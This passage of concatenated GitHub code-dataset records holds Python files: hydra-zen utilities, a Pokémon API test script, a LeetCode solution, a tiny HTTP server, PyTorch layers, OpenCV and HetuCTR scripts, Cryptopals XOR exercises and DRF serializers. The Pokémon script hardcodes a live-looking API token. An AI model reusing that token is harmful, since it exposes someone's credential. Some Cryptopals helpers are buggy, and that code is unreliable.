print(\"Listo\")\r\n for x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n elif x==x1 and y==y1:\r\n tabla.append('x')\r\n elif x==x2 and y==y2:\r\n tabla.append('x')\r\n elif y2==y or y1==y:\r\n tabla.append(' ')\r\n elif x2>x>x1 and y1>y2:\r\n tabla.append(' ')\r\n elif x==y and x\"\nKNOWN_MUTABLE_TYPES: Set[\n Union[Type[List[Any]], Type[Dict[Any, Any]], Type[Set[Any]]]\n] = {list, dict, set}\n\nT = TypeVar(\"T\")\n\n\n# The typeshed definition of `field` has an inaccurate annotation:\n# https://github.com/python/typeshed/blob/b9e1d7d522fe90b98e07d43a764bbe60216bc2c4/stdlib/dataclasses.pyi#L109\n# This makes it impossible for `make_dataclass` to by type-correct in the eyes of\n# static checkers. See https://github.com/microsoft/pyright/issues/1680 for discussion.\n#\n# We happen to make rather heavy use of `make_dataclass`, thus we..*sigh*.. 
we provide\n# our own overloads for `field`.\n@overload  # `default` and `default_factory` are optional and mutually exclusive.\ndef field(\n    *,\n    default: Any,\n    init: bool = ...,\n    repr: bool = ...,\n    hash: Optional[bool] = ...,\n    compare: bool = ...,\n    metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]:  # pragma: no cover\n    ...\n\n\n@overload\ndef field(\n    *,\n    default_factory: Callable[[], Any],\n    init: bool = ...,\n    repr: bool = ...,\n    hash: Optional[bool] = ...,\n    compare: bool = ...,\n    metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]:  # pragma: no cover\n    ...\n\n\ndef field(\n    *,\n    default: Any = MISSING,\n    default_factory: Union[Callable[[], Any], Any] = MISSING,\n    init: bool = True,\n    repr: bool = True,\n    hash: Optional[bool] = None,\n    compare: bool = True,\n    metadata: Optional[Mapping[Any, Any]] = None,\n) -> Field[Any]:\n    if default is MISSING:\n        return cast(\n            Field[Any],\n            _field(\n                default_factory=default_factory,\n                init=init,\n                repr=repr,\n                hash=hash,\n                compare=compare,\n                metadata=metadata,\n            ),\n        )\n    else:\n        return cast(\n            Field[Any],\n            _field(\n                default=default,\n                init=init,\n                repr=repr,\n                hash=hash,\n                compare=compare,\n                metadata=metadata,\n            ),\n        )\n\n\ndef safe_name(obj: Any, repr_allowed: bool = True) -> str:\n    \"\"\"Tries to get a descriptive name for an object. Returns '<unknown>'\n    instead of raising - useful for writing descriptive/safe error messages.\"\"\"\n\n    if hasattr(obj, \"__name__\"):\n        return obj.__name__.replace(\"<lambda>\", \"lambda\")\n\n    if repr_allowed and hasattr(obj, \"__repr__\"):\n        return repr(obj).replace(\"<lambda>\", \"lambda\")\n\n    return UNKNOWN_NAME\n\n\ndef is_classmethod(obj: Any) -> bool:\n    \"\"\"\n    https://stackoverflow.com/a/19228282/6592114\n\n    Credit to: Martijn Pieters\n    License: CC BY-SA 4.0 (free to copy/redistribute/remix/transform)\"\"\"\n\n    if not inspect.ismethod(obj):\n        return False\n\n    bound_to = getattr(obj, \"__self__\", None)\n    if not isinstance(bound_to, type):\n        # must be bound to a class\n        return False\n    name = safe_name(obj)\n\n    if name == UNKNOWN_NAME:  # pragma: no cover\n        return False\n\n    for cls in bound_to.__mro__:\n        descriptor = vars(cls).get(name)\n        if descriptor is not None:\n            return isinstance(descriptor, classmethod)\n    return False  # pragma: no cover\n\n\ndef building_error_prefix(target: Any) -> str:\n    return f\"Building: {safe_name(target)} ..\\n\"\n\n\nNoneType = type(None)\n\n\ndef is_interpolated_string(x: Any) -> TypeGuard[InterpStr]:\n    # This is only a necessary check – not a sufficient one – that `x`\n    # is a valid interpolated string. We do not verify that it rigorously\n    # satisfies omegaconf's grammar\n    return isinstance(x, str) and len(x) > 3 and x.startswith(\"${\") and x.endswith(\"}\")\n\n\ndef check_suspicious_interpolations(\n    validated_wrappers: Sequence[Any], zen_meta: Mapping[str, Any], target: Any\n):\n    \"\"\"Looks for patterns among zen_meta fields and interpolated fields in\n    wrappers. 
Relative interpolations pointing to the wrong level will produce\n a warning\"\"\"\n for _w in validated_wrappers:\n if is_interpolated_string(_w):\n _lvl = _w.count(\".\") # level of relative-interp\n _field_name = _w.replace(\".\", \"\")[2:-1]\n if (\n _lvl\n and _field_name in zen_meta\n and _lvl != (1 if len(validated_wrappers) == 1 else 2)\n ):\n _expected = II(\n \".\" * (1 if len(validated_wrappers) == 1 else 2) + _field_name\n )\n\n warnings.warn(\n building_error_prefix(target)\n + f\"A zen-wrapper is specified via the interpolated field, {_w},\"\n f\" along with the meta-field name {_field_name}, however it \"\n f\"appears to point to the wrong level. It is likely you should \"\n f\"change {_w} to {_expected}\"\n )\n yield _expected\n\n\ndef valid_defaults_list(hydra_defaults: Any) -> bool:\n \"\"\"\n Raises\n ------\n HydraZenValidationError: Duplicate _self_ entries\"\"\"\n if not isinstance(hydra_defaults, (list, ListConfig)):\n return False\n\n has_self = False\n for item in hydra_defaults:\n if item == \"_self_\":\n if not has_self:\n has_self = True\n continue\n raise HydraZenValidationError(\n \"`hydra_defaults` cannot have more than one '_self_' entry\"\n )\n\n if isinstance(item, (dict, DictConfig)):\n for k, v in item.items():\n if not isinstance(k, str):\n return False\n\n if (\n not isinstance(v, (str, list, ListConfig))\n and v is not None\n and v != MISSING\n ):\n return False\n elif isinstance(item, str):\n continue\n elif is_dataclass(item):\n # no validation here\n continue\n else:\n return False\n\n if not has_self:\n warnings.warn(\n \"Defaults list is missing `_self_`. See https://hydra.cc/docs/upgrades/1.0_to_1.1/default_composition_order for more information\",\n category=UserWarning,\n )\n return True\n\n\ndef merge_settings(\n user_settings: Optional[ZenConvert], default_settings: AllConvert\n) -> AllConvert:\n \"\"\"Merges settings as `default_settings.update(user_settings)`\"\"\"\n if user_settings is not None and not isinstance(user_settings, Mapping):\n raise TypeError(\n f\"`zen_convert` must be None or Mapping[str, Any] (e.g. dict). Got {user_settings}\"\n )\n settings = default_settings.copy()\n if user_settings:\n for k, v in user_settings.items():\n if k not in convert_types:\n raise ValueError(\n f\"The key `{k}` is not a valid zen_convert setting. The available settings are: {', '.join(sorted(convert_types))}\"\n )\n if not isinstance(v, convert_types[k]):\n raise TypeError(\n f\"Setting {k}={v} specified a value of the wrong type. Expected type: {convert_types[k].__name__}\"\n )\n settings[k] = v\n return settings\n\n\n_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n DataclassOptions.__required_keys__ | DataclassOptions.__optional_keys__\n)\n\n_STRICT_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n StrictDataclassOptions.__required_keys__ | StrictDataclassOptions.__optional_keys__\n)\n_STRICT_DATACLASS_OPTION_KEYS.copy()\n\n\ndef parse_dataclass_options(\n options: Mapping[str, Any], include_module: bool = True\n) -> DataclassOptions:\n \"\"\"\n Ensures `options` adheres to `DataclassOptions` and merges hydra-zen defaults\n for missing options.\n\n All valid `@dataclass`/`make_dataclass` options are supported, even for features\n introduced in later versions of Python. 
This function will remove valid options\n that are not supported for by the current Python version.\n\n Parameters\n ----------\n options : Mapping[str, Any]\n User-specified options for `zen_dataclass` to be validated.\n\n Returns\n -------\n DataclassOptions\n\n Examples\n --------\n >>> parse_dataclass_options({})\n {'unsafe_hash': True}\n\n >>> parse_dataclass_options({\"unsafe_hash\": False, \"cls_name\": \"Foo\"})\n {'unsafe_hash': False, 'cls_name': 'Foo'}\n\n >>> parse_dataclass_options({\"moo\": 1})\n ValueError: moo is not a valid dataclass option.\n\n Options that are supported by `make_dataclass` for later versions of\n Python are ignored/removed automatically by this function. E.g. the following\n Python 3.10+ option has the following behavior in Python 3.9:\n\n >>> parse_dataclass_options({\"slots\": False})\n {'unsafe_hash': True}\n \"\"\"\n if not isinstance(options, Mapping):\n raise ValueError(\n f\"`zen_dataclass_options` is expected to be `None` or dict[str, bool]. Got \"\n f\"{options} (type: {type(options)}).\"\n )\n\n merged = DEFAULT_DATACLASS_OPTIONS.copy()\n\n for name, val in options.items():\n if name in UNSUPPORTED_DATACLASS_OPTIONS:\n continue\n elif name not in _DATACLASS_OPTION_KEYS:\n raise ValueError(f\"{name} is not a valid dataclass option.\")\n\n if name == \"module\":\n if val is not None and (\n not isinstance(val, str)\n or not all(\n v.isidentifier() and not iskeyword(v) for v in val.split(\".\")\n )\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid module name, got {val}\"\n )\n\n elif name == \"cls_name\":\n if val is not None and (not isinstance(val, str) or not val.isidentifier()):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid identifier, got {val}\"\n )\n elif name == \"bases\":\n if not isinstance(val, Iterable) or any(\n not (is_dataclass(_b) and isinstance(_b, type)) for _b in val\n ):\n raise TypeError(\n f\"dataclass option `{name}` must be a tuple of dataclass types\"\n )\n elif name == \"namespace\":\n if not isinstance(val, Mapping) or any(\n not isinstance(v, str) or not v.isidentifier() for v in val\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a mapping with string-valued keys \"\n f\"that are valid identifiers. Got {val}.\"\n )\n elif name == \"target\":\n if not isinstance(val, str) or not all(\n x.isidentifier() for x in val.split(\".\")\n ):\n raise TypeError(\n f\"dataclass option `target` must be a string and an import path, \"\n f\"got {val!r}\"\n )\n elif not isinstance(val, bool):\n raise TypeError(\n f\"dataclass option `{name}` must be of type `bool`. 
Got {val} \"\n f\"(type: {type(val)})\"\n )\n merged[name] = val\n if (\n include_module\n and \"module\" not in merged\n and \"module\" in _STRICT_DATACLASS_OPTION_KEYS\n ): # pragma: no cover\n # For Python 3.12+ we want the default module to\n # remain \"types\" rather than being inferred as some\n # internal hydra-zen module.\n merged[\"module\"] = \"types\"\n return merged\n\n\ndef parse_strict_dataclass_options(\n options: Mapping[str, Any]\n) -> TypeGuard[StrictDataclassOptions]:\n return (\n options.keys() <= _STRICT_DATACLASS_OPTION_KEYS\n and StrictDataclassOptions.__required_keys__ <= options.keys()\n )\n\n\n_HYDRA_CONVERT_OPTIONS = (\n {\"none\", \"partial\", \"all\", \"object\"}\n if HYDRA_SUPPORTS_OBJECT_CONVERT\n else {\"none\", \"partial\", \"all\"}\n)\n\n\ndef validate_hydra_options(\n hydra_recursive: Optional[bool] = None,\n hydra_convert: Optional[Literal[\"none\", \"partial\", \"all\", \"object\"]] = None,\n) -> None:\n if hydra_recursive is not None and not isinstance(hydra_recursive, bool):\n raise TypeError(\n f\"`hydra_recursive` must be a boolean type, got {hydra_recursive}\"\n )\n\n if hydra_convert is not None and hydra_convert not in _HYDRA_CONVERT_OPTIONS:\n raise ValueError(\n f\"`hydra_convert` must be 'none', 'partial',\"\n f\"{' object' if HYDRA_SUPPORTS_OBJECT_CONVERT else ''} or 'all', got: \"\n f\"{hydra_convert}\"\n )\n","repo_name":"mit-ll-responsible-ai/hydra-zen","sub_path":"src/hydra_zen/structured_configs/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"18"}
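The `merge_settings` helper in the record above follows a defaults-plus-validated-overrides pattern. A minimal standalone sketch of that pattern (the `DEFAULTS` and `ALLOWED_TYPES` tables below are illustrative stand-ins, not hydra-zen's actual tables):

```python
# Sketch of the merge-and-validate pattern used by merge_settings above.
# The setting names and type table here are hypothetical.
from typing import Any, Mapping, Optional

DEFAULTS = {"dataclass": True, "namedtuple": False}
ALLOWED_TYPES = {"dataclass": bool, "namedtuple": bool}

def merge(user: Optional[Mapping[str, Any]]) -> dict:
    if user is not None and not isinstance(user, Mapping):
        raise TypeError(f"settings must be None or a Mapping, got {user}")
    out = dict(DEFAULTS)  # copy first, so the shared defaults are never mutated
    for k, v in (user or {}).items():
        if k not in ALLOWED_TYPES:
            raise ValueError(f"{k} is not a valid setting")
        if not isinstance(v, ALLOWED_TYPES[k]):
            raise TypeError(f"{k}={v} has the wrong type")
        out[k] = v
    return out

print(merge(None))                  # {'dataclass': True, 'namedtuple': False}
print(merge({"namedtuple": True}))  # {'dataclass': True, 'namedtuple': True}
```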
+{"seq_id":"31135136275","text":"import requests\r\nimport json\r\ntoken = '181e9195a049ec50a01032126911a7f5'\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"name\": \"Opponent\",\r\n \"photo\": \"https://static.wikia.nocookie.net/pokemon/images/2/21/001Bulbasaur.png\"\r\n})\r\npokemon_id = response.json()['id']\r\nresponse_change = requests.put('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token}, json ={\r\n \"pokemon_id\": pokemon_id,\r\n \"name\": \"Opponent 78\",\r\n \"photo\": \"\" \r\n })\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons/trainers/add_pokeball',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"pokemon_id\": \"3186\"\r\n})\r\nprint (response_change.text) ","repo_name":"nikita-shevchukov/python_autotests","sub_path":"test/PythonProjects/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"43475328522","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: xiezizhe\n@Date: 26/2/2020 上午11:13\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if nums is None:\n return 0\n if len(nums) <= 1:\n return len(nums)\n cur_idx, next_idx = 0, 1\n while next_idx < len(nums):\n if nums[next_idx] == nums[cur_idx]:\n while next_idx < len(nums) and nums[next_idx] == nums[cur_idx]:\n next_idx += 1\n if next_idx < len(nums):\n nums[cur_idx + 1] = nums[next_idx]\n else:\n break\n cur_idx += 1\n next_idx += 1\n nums[cur_idx] = nums[next_idx - 1]\n\n return cur_idx + 1\n\n\nif __name__ == '__main__':\n l = [1, 1, 1, 1, 1, 2, 2, 3, 4, 5, 6]\n s = Solution()\n print(s.removeDuplicates(l))\n print(l)\n","repo_name":"forrest0402/leetcode","sub_path":"python/26. Remove Duplicates from Sorted Array.py","file_name":"26. Remove Duplicates from Sorted Array.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"29705705245","text":"import http.server\nfrom socketserver import ThreadingMixIn\nimport threading\nimport json, re\n\nclass ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):\n allow_reuse_address = True\n def shutdown(self):\n self.socket.close()\n http.server.HTTPServer.shutdown(self)\n\ndef route(path):\n def _route(f):\n setattr(f, '__route__', path)\n return f\n return _route\n\ndef read_params(path):\n query = path.split('?')\n if len(query) > 1:\n query = query[1].split('&')\n return dict(map(lambda x: x.split('='), query))\n\ndef get(req_handler, routes):\n for name, handler in routes.__class__.__dict__.items():\n if hasattr(handler, \"__route__\"):\n if None != re.search(handler.__route__, req_handler.path):\n req_handler.send_response(200)\n req_handler.send_header('Content-Type', 'application/json')\n req_handler.send_header('Access-Control-Allow-Origin', '*')\n req_handler.end_headers()\n params = read_params(req_handler.path)\n data = json.dumps(handler(routes, params)) + '\\n'\n req_handler.wfile.write(bytes(data, encoding = 'utf-8'))\n return\n\ndef run(routes, host = '0.0.0.0', port = 8080):\n class RequestHandler(http.server.BaseHTTPRequestHandler):\n def log_message(self, *args, **kwargs):\n pass\n def do_GET(self):\n get(self, routes)\n server = ThreadedHTTPServer((host, port), RequestHandler)\n thread = threading.Thread(target = server.serve_forever)\n thread.daemon = True\n thread.start()\n print (f\"HTTP server started on port {port}\")\n","repo_name":"paramtt/twitch-custom","sub_path":"server/srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3971502820","text":"import torch.nn as nn\n\nfrom .registry import PLUGIN_LAYERS\n\n\n@PLUGIN_LAYERS.register_module()\nclass Dropout2d_(nn.Dropout2d):\n \"\"\" To fit the plugin interface\n \"\"\"\n\n def __init__(self, in_channels, p, inplace=True):\n super(Dropout2d_, self).__init__(p, inplace=inplace)\n\n\n@PLUGIN_LAYERS.register_module()\nclass SELayer(nn.Module):\n _abbr_ = 'se'\n def __init__(self, in_channels, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(in_channels, in_channels // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(in_channels // reduction, in_channels, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n","repo_name":"tfwu/iVMCL-Release","sub_path":"mmcv/mmcv/cnn/bricks/plugin_ivmcl.py","file_name":"plugin_ivmcl.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"}
+{"seq_id":"3830363981","text":"import numpy as np\r\nimport cv2\r\n\r\n\r\n# Open Camera\r\ncapture = cv2.VideoCapture(0)\r\n\r\nwhile capture.isOpened():\r\n\r\n # Capture frames from the camera\r\n ret, frame = capture.read()\r\n\r\n # Get hand data from the rectangle sub window\r\n cv2.rectangle(frame, (100, 100), (300, 300), (0, 255, 0), 0)\r\n crop_image = frame[100:300, 100:300]\r\n\r\n # Apply Gaussian blur\r\n blur = cv2.GaussianBlur(crop_image, (3, 3), 0)\r\n\r\n # Change color-space from BGR -> HSV\r\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\r\n\r\n # Create a binary image with where white will be skin colors and rest is black\r\n mask2 = cv2.inRange(hsv, np.array([2, 0, 0]), np.array([20, 255, 255]))\r\n cv2.imshow(\"image\",mask2);\r\n\r\n # Kernel for morphological transformation\r\n kernel = np.ones((5, 5))\r\n\r\n # Apply morphological transformations to filter out the background noise\r\n dilation = cv2.dilate(mask2, kernel, iterations=1)\r\n erosion = cv2.erode(dilation, kernel, iterations=1)\r\n\r\n # Apply Gaussian Blur and Threshold\r\n filtered = cv2.GaussianBlur(erosion, (3, 3), 0)\r\n ret, thresh = cv2.threshold(filtered, 127, 255, 0)\r\n#####\r\n #cv2.imshow(\"Threshold\",thresh)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\ncapture.release()\r\ncv2.destroyAllWindows()","repo_name":"RashmithaEttadi/HandGestureRecognition","sub_path":"pg2.py","file_name":"pg2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"4099135257","text":"import hetu as ht\nfrom hetu.launcher import launch\nfrom hetu import init\nfrom hetu.gpu_ops.SharedTable import SharedTableOp\nfrom hetu.communicator.mpi_nccl_comm import ncclDataType_t, ncclRedOp_t\n\nfrom models.hetuctr_data import load_dataset\nfrom models.hetuctr_models import WDL, DCN, DFM\n\nimport os.path as osp\nimport numpy as np\nimport yaml\nimport time\nimport argparse\nfrom sklearn import metrics\n\ndef comm_sync_data(comm, *args):\n array = ht.array(args, ht.cpu())\n comm.dlarrayNcclAllReduce(array, array, ncclDataType_t.ncclFloat32, ncclRedOp_t.ncclSum, comm.stream)\n comm.stream.sync()\n return array.asnumpy() / comm.nRanks.value\n\ndef worker(args):\n def train(iterations, auc_enabled=False):\n localiter = range(iterations)\n train_loss = []\n train_acc = []\n if auc_enabled:\n train_auc = []\n for it in localiter:\n loss_val, predict_y, y_val, _ = executor.run('train', convert_to_numpy_ret_vals=True)\n if y_val.shape[1] == 1: # for criteo case\n acc_val = np.equal(\n y_val,\n predict_y > 0.5).astype(float)\n else:\n acc_val = np.equal(\n np.argmax(y_val, 1),\n np.argmax(predict_y, 1)).astype(float)\n train_loss.append(loss_val[0])\n train_acc.append(acc_val)\n if auc_enabled:\n train_auc.append(metrics.roc_auc_score(y_val, predict_y))\n if auc_enabled:\n return np.mean(train_loss), np.mean(train_acc), np.mean(train_auc)\n else:\n return np.mean(train_loss), np.mean(train_acc), 0\n def validate(iterations):\n localiter = range(iterations)\n test_loss = []\n test_acc = []\n test_auc = []\n for it in localiter:\n loss_val, test_y_predicted, y_test_val = executor.run('validate', convert_to_numpy_ret_vals=True)\n if y_test_val.shape[1] == 1: # for criteo case\n correct_prediction = np.equal(\n y_test_val,\n test_y_predicted > 0.5).astype(float)\n else:\n correct_prediction = np.equal(\n np.argmax(y_test_val, 1),\n np.argmax(test_y_predicted, 1)).astype(float)\n test_loss.append(loss_val[0])\n test_acc.append(correct_prediction)\n test_auc.append(metrics.roc_auc_score(y_test_val, test_y_predicted))\n return np.mean(test_loss), np.mean(test_acc), np.mean(test_auc)\n\n def get_shard(data):\n part_size = data.shape[0] // nrank\n start = part_size * rank\n end = start + part_size if rank != nrank - 1 else data.shape[0]\n return data[start:end]\n\n def get_partitioned_shard(data):\n if data_arr is not None:\n return data[np.where(data_arr==rank)]\n else:\n return get_shard(data)\n\n batch_size = args.batch_size\n\n nrank = comm.nRanks.value\n\n dense, sparse, labels = load_dataset(args.dataset, val=False)\n has_dense_feature = dense is not None\n dense_input = [[get_partitioned_shard(dense), batch_size, 'train']] if has_dense_feature else None\n sparse_input = [ht.Dataloader(get_partitioned_shard(sparse).astype(np.int64), batch_size, 'train', use_numpy=True)]\n y_ = [[get_partitioned_shard(labels), batch_size, 'train']]\n\n if args.val:\n val_dense, val_sparse, val_labels = load_dataset(args.dataset, val=True)\n if has_dense_feature:\n dense_input.append([get_shard(val_dense), batch_size, 'validate'])\n sparse_input.append(ht.Dataloader(get_shard(val_sparse).astype(np.int64), batch_size, 'validate', use_numpy=True))\n y_.append([get_shard(val_labels), batch_size, 'validate'])\n\n dense_input = ht.dataloader_op(dense_input) if has_dense_feature else None\n sparse_input = ht.dataloader_op(sparse_input)\n y_ = ht.dataloader_op(y_)\n\n print(\"Data loaded.\")\n models = {\"wdl\" : WDL, \"dcn\" : DCN, \"dfm\" : DFM}\n loss, prediction, y_, train_op = 
models[args.model](args.dataset, dense_input, sparse_input, y_, args.embed_dim, rank, nrank, device_id,\n args.bound, root_arr, storage_arr)\n\n eval_nodes = {'train': [loss, prediction, y_, train_op]}\n if args.val:\n print('Validation enabled...')\n eval_nodes['validate'] = [loss, prediction, y_]\n executor = ht.Executor(eval_nodes, ctx=ht.gpu(device_id), comm_mode=\"AllReduce\" if nrank > 1 else None, seed=123, log_path='./logs/')\n\n if rank == 0:\n log_file = open(args.output, 'w')\n for ep in range(args.iter // args.log_every):\n ep_st = time.time()\n train_loss, train_acc, train_auc = train(args.log_every)\n ep_en = time.time()\n train_time, train_loss, train_acc, train_auc = comm_sync_data(comm, ep_en - ep_st, train_loss, train_acc, train_auc)\n if rank==0:\n printstr = \"TRAIN %d: loss %.4f acc %.4f time %.4f speed %d\" % (ep * args.log_every, train_loss, train_acc, train_time, args.log_every*batch_size/train_time)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n if args.val and ep > 0 and ep % (args.eval_every // args.log_every) == 0:\n val_loss, val_acc, val_auc = validate(executor.get_batch_num('validate'))\n val_loss, val_acc, val_auc = comm_sync_data(comm, val_loss, val_acc, val_auc)\n if rank==0:\n printstr = \"EVAL %d: val_loss %.4f val_acc %.4f val_auc %.4f\" % (ep * args.log_every, val_loss, val_acc, val_auc)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset\", type=str, required=True, help=\"[criteo avazu company]\")\n parser.add_argument(\"--model\", type=str, required=True, help=\"[wdl dcn dfm]\")\n parser.add_argument(\"--val\", action=\"store_true\", help=\"whether to use validation\")\n parser.add_argument(\"--bound\", type=int, default=10, help=\"cache bound\")\n parser.add_argument(\"--batch_size\", type=int, default=128, help=\"batch size\")\n parser.add_argument(\"--embed_dim\", type=int, default=128, help=\"embedding dim\")\n parser.add_argument(\"--iter\", type=int, default=10000, help=\"number of iterations\")\n parser.add_argument(\"--log_every\", type=int, default=200)\n parser.add_argument(\"--eval_every\", type=int, default=10000)\n parser.add_argument(\"--store_rate\", type=float, default=0.01)\n parser.add_argument(\"--partition\", type=str, default=None)\n parser.add_argument(\"--output\", type=str, default=\"hetuctr.log\")\n args = parser.parse_args()\n\n comm, device_id = ht.mpi_nccl_init()\n rank = comm.myRank.value\n if args.partition:\n args.partition = osp.normpath(osp.expanduser(args.partition))\n assert osp.exists(args.partition)\n partition = np.load(args.partition)\n data_arr = partition[\"data_partition\"]\n root_arr = partition[\"embed_partition\"]\n storage_arr = partition[str(rank)]\n storage_arr = storage_arr[:int(args.store_rate * len(storage_arr))]\n storage_arr = np.concatenate([np.where(root_arr==rank)[0], storage_arr])\n else:\n data_arr, root_arr, storage_arr = None, None, None\n\n worker(args)\n ht.mpi_nccl_finish(comm)\n","repo_name":"Hsword/SIGMOD2022_HET-GMP","sub_path":"examples/hetuctr.py","file_name":"hetuctr.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"14619488528","text":"import base64\r\nimport re\r\nimport codecs\r\n\r\ndef convert_hex_to_base64(str=\"cXVlc3Rpb24z\"):\r\n return base64.b64encode(str)\r\n\r\n\r\ndef fixed_xor(str1=\"abcdef\", str2=\"qwerty\"):\r\n str_tmp = []\r\n for i in range(0, len(str1)):\r\n str_tmp += [chr(ord(str1[i]) ^ ord(str2[i]))]\r\n str_tmp = \"\".join(str_tmp)\r\n return codecs.encode(str_tmp)\r\n\r\n\r\ndef single_byte_xor_cipher(input_hex_str=\"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"):\r\n highest_score = 0\r\n best_result = ''\r\n best_key = None\r\n\r\n # 转换为字节列表\r\n byte_array = bytearray.fromhex(input_hex_str)\r\n\r\n for i in range(256): # 尝试每个可能的key值\r\n # 解密XOR\r\n decoded_bytes = bytes([b ^ i for b in byte_array])\r\n # 仅计算小写字母的数量,因为大写字母的频率通常较低\r\n score = sum(ord('a') <= byte <= ord('z') for byte in decoded_bytes)\r\n\r\n # 更新最佳得分和对应的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_bytes.decode('latin1') # 解码为字符串,假设是latin1编码\r\n best_key = chr(i)\r\n\r\n return best_key, best_result\r\n\r\n\r\n# print(single_byte_xor_cipher())\r\nfrom collections import Counter\r\n\r\n\r\ndef detect_single_character_xor(file_name=\"4.txt\"):\r\n highest_score = 0\r\n best_result = ''\r\n key_candidate = ''\r\n original_cipher = ''\r\n\r\n with open(file_name, \"r\") as file:\r\n for line in file:\r\n hex_string = line.strip() # 去除可能的换行符和空白符\r\n for key_value in range(256): # 扩展至256,因为单字节XOR的可能值有256个\r\n # XOR每个可能的字符,并解码成ASCII\r\n decoded_chars = [chr(key_value ^ int(byte_pair, 16)) for byte_pair in re.findall('.{2}', hex_string)]\r\n decoded_string = ''.join(decoded_chars)\r\n\r\n # 使用Counter来计算每个字符的出现频率\r\n frequency = Counter(decoded_string.lower()) # 将字符串转换为小写进行统计\r\n score = sum(frequency.get(c, 0) for c in 'etaoin shrdlu') # 基于字母频率给字符串打分\r\n\r\n # 更新得到更高分的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_string\r\n key_candidate = chr(key_value)\r\n original_cipher = hex_string\r\n\r\n return original_cipher, key_candidate, best_result\r\n\r\n\r\nprint(\"cXVlc3Rpb24z\")\r\nprint(fixed_xor())\r\nprint(single_byte_xor_cipher())\r\nprint(detect_single_character_xor())\r\n","repo_name":"HumboldtC/XD_CRYPTO","sub_path":"EXP1/3_Cryptopals_set1.py","file_name":"3_Cryptopals_set1.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6399811552","text":"from rest_framework import serializers\nfrom metrics.models import Metric, MetricCollection\n\n\nclass MetricSerializer(serializers.ModelSerializer):\n class Meta:\n model = Metric\n fields = (\n \"time\",\n \"type\",\n \"data\",\n )\n\n\nclass MetricCollectionSerializer(serializers.ModelSerializer):\n metrics = serializers.SerializerMethodField()\n\n class Meta:\n model = MetricCollection\n fields = (\n \"type\",\n \"metrics\",\n )\n\n def get_metrics(self, metric_collection):\n metrics = metric_collection.metrics.all()\n serializer = MetricCollectionSerializer(\n metrics,\n many=True,\n )\n return serializer.data\n","repo_name":"wizenheimer/Arcadian","sub_path":"metrics/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
